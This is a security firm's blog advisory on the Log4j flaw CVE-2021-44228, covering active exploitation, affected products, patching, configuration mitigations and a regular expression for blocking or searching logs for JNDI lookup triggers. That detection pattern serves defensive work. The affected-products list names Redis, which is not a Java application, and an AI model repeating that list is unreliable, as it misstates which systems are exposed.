Sales: 833-761-0695
Support: 509-465-1234 x 2
Remote Support Login
See Service Pricing

Log4j Critical Vulnerability 

The critical vulnerability CVE-2021-44228 against log4j was released with zero-day exploitation actively occurring. If a device/application uses Java and logs any string relying on user input, it is vulnerable, and an attacker can run anything they wish on the system.

by

marketing@torchlight.io
in
Apache Log4J Logo

The critical vulnerability CVE-2021-44228 against log4j was released with zero-day exploitation actively occurring. If a device/application uses Java and logs any string relying on user input, it is vulnerable, and an attacker can run anything they wish on the system.

Currently, there is a public proof-of-concept, and we are observing the first wave of discovery attacks to determine who is vulnerable and the beginnings of the second wave consisting of crypto mining software. Following the standard escalation trend for this type of vulnerability, we expect to see automated ransomware deployment occurring by Monday, December 13, 2021.

Affected Systems/Applications of Note

As stated before, devices/applications that use Java logging containing user input are vulnerable. Some currently known vulnerable applications and services include:

  • Apache Solr, Druid, Flink, and Struts2
  • Redis
  • Logstash
  • Elastic Search
  • Kafka
  • Even home entertainment applications like Minecraft and Steam!

Remediation

The updated and secure version of log4j is available directly for developers using the component: https://logging.apache.org/log4j/2.x/download.html

Third-party applications and systems should be patched immediately, and any subsequent patches should be evaluated and installed as quickly as possible.

Mitigation

According to Cloudflare, this attack can be mitigated by using one of these two configuration changes:

  • Set the system property “log4j2.formatMsgNoLookups” to “true”
  • Remove the JndiLookup class from the classpath

Another mitigation is to use web applications and other firewalls to block the triggers from the proof-of-concept. This will require testing as it can very well break things! From current knowledge, the regular expression to block or use to search logs is:

  • \$\{jndi:(ldap[s]?|rmi|dns):/[^\n]+

Conclusion

Due to this being a component used by a substantial number of applications and systems, keep a close watch on anything that uses Java or Apache in any way. A spike in CPU usage on such a system may indicate crypto mining activity and ransomware could be next.

Reach out to TorchLight at sales@torchlight.io for help on remediation or any questions.

Additional Resources

  • https://www.govcert.ch/blog/zero-day-exploit-targeting-popular-java-library-log4j/
  • https://www.zdnet.com/article/log4j-zero-day-flaw-what-you-need-to-know-and-how-to-protect-yourself/